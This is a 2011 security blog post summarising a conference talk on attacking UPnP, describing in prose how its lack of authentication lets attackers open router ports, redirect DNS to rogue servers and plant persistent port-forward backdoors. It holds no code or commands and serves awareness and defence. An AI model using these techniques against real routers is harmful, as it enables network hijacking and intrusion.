Talk: Attack UPnP – The Useful plug and pwn protocols

René Pfeiffer/ June 18, 2011/ Security

Most firewall admins are quite allergic to Universal Plug and Play (UPnP). This is why it is usually turned off. Arron „Finux“ Finnon explains what UPnP can do. Its intended use is to facilitate data transmissions of UPnP-capable devices, meaning that these devices and software can use UPnP to poke holes into NAT devices and firewalls. Enabling UPnP a spare router with a free Wi-Fi network enables you to learn a lot about your neighbours. You can do device enumerating and identify devices requesting. And this is just the beginning.

UPnP solved their security problems by not implying any security

It’s a bit like Bonjour, a bit like mDNS, a bit like this and that. From the security point of view it’s a nightmare. There’s no authentication and no authorisation. UPnP will happily do anything you ask it for. You can modify filter rules and configure NAT  from any device. You can add a NAT rule to make the web interface of your router accessible by UPnP even though you have disabled external access to the management web interface. Any sane sysadmin turns it off, but it is enabled on most home routers not configured by people with background knowledge. It often stays enabled on devices such as smart phones, multimedia players, TV sets, game consoles, VoIP phones, printers and such.

What are the hacks? Well, you can open port 53 on your router inside and outside, redirect traffic to a rogue DNS server and hijack data transmission by fake DNS information. You can trick Microsoft Windows into downloading malicious image files from the Internet. Due to poor error checking you can put NAT rules into non-volatile memory, so that the trick „turn it off and on again“ doesn’t work anymore. This means you can put backdoors into a router (by using port forwardings) that stay there. You can exhaust port ranges used for specific protocols (such as VoIP). You can remove port mappings as well. You can list all dynamic port mappings of a device.
The list goes on and on and on

Despite these design flaws UPnP is widely used. Even malware has UPnP capabilities for obvious reasons. Still UPnP is added to router models and deployed to customers, mainly to reduce the amount of support calls for software/games/things that aren’t working.

So even if you know about UPnP and turn it off, watch out for its presence in networks you might use. You’ve got a smart phone with Wi-Fi, right?

Share this Post

About René Pfeiffer

System administrator, lecturer, hacker, security consultant, technical writer and DeepSec organisation team member. Has done some particle physics, too. Prefers encrypted messages for the sake of admiring the mathematical algorithms at work.